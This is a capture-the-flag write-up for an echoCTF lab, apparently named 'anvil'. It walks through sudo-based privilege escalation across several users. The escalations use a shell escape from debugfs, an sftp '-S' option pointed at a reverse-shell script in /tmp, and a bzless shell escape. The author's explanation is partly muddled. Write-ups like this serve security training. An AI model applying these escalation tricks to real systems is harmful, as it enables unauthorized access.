How’s your OS escalation skills? See if you can reach the final user (ETSCTF)
On each user you successfully escalate, there will be a flag on its home directory. This flag can also be used as a password to directly switch to that user (eg with su - copper) at a later time so that you dont have to go through all the steps every time you re-connect.
To start the challenge connect with nc -t 10.0.40.10 1337, or telnet 10.0.40.10 1337. Your timer starts from the first time you connect to the service.
Let jump in without wasting to much of time.
Shell As Silver
┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/anvil]
└─$ nc -t 10.0.40.10 1337
copper@anvil:~$ sudo -l
sudo -l
User copper may run the following commands on anvil:
(silver) NOPASSWD: /sbin/debugfs
copper@anvil:~$ id
id
uid=1001(copper) gid=1001(copper) groups=1001(copper)
copper@anvil:~$ sudo -u silver /sbin/debugfs
sudo -u silver /sbin/debugfs
debugfs 1.44.5 (15-Dec-2018)
debugfs: !sh
!sh
$ id
id
uid=1002(silver) gid=1002(silver) groups=1002(silver)
$
So i confirm if i can run sudo with any command luckily i got /sbin/debugfs which was exploited above let move to another user.
Shell As Gold
silver@anvil:/home/copper$ sudo -l
sudo -l
User silver may run the following commands on anvil:
(gold) NOPASSWD: /usr/bin/sftp
silver@anvil:/home/copper$
Seems we can run sftp with sudo which is cool let exploit it.
But seems like a dead we know SSH port running interesting so i decided to host an SSH port on the target using SimpleHTTPServer .
Ready and running let try it again.
Seems like a dead end again i can’t create .ssh directory so i change directory to /tmp to host a bash shell in a file with a reverse shell payload in it.
But ready and making it executable also with an Ncat listener on now let hit it.
sudo -u gold /usr/bin/sftp -S /tmp/shell.sh muzec@localhost
Boom we have shell.
Shell As ETSCTF
sudo -u ETSCTF /bin/bzless -h
!sh
We are done.
Greeting From Muzec